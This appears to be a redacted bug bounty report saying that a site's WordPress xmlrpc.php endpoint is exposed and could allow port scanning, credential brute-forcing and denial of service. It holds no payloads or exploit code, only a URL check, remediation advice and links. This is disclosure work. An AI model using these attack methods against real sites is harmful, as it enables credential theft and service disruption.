xmlrpc.php FILE IS enable which enables attacker to XSPA Brute-force and even Denial of Service(DOS), in https://████/xmlrpc.php

##Summary: Hello team, I have found a security vulnerability inhttps://███████/xmlrpc.php which lets attacker to: 1: XSPA or PortScan 2: Bruteforce 3:DOS and much more ##Description: ##Impact Step-by-step Reproduction Instructions █████████ 1: Go to https://██████/xmlrpc.php to check if it is enabled or not. Remediation: If the xmlrpc.php file is not being used, it should be disabled and removed completely to avoid any potential risks. Otherwise, it should at the very least be blocked from external access. Reference: https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 https://medium.com/@protector47/how-to-hack-wordpress-website-via-xmlrpc-php-61c813fa3740 https://hackerone.com/reports/325040?fbclid=IwAR0qgG-Xfzfi8epruslb_aB91f-Nj8DitF0su8O9ibFKSFdvefJ8h_qWNyc https://hackerone.com/reports/752073?fbclid=IwAR2i3AM4woHlr01MvyJR-Vu485XQg_gxb1doWmAhSBTfxPK9cUSRFxO2iFo ## Impact This method is also used for brute force attacks to stealing the admin credentials and other important credentials This can be automated from multiple hosts and be used to cause a mass DDOS attack on the victim.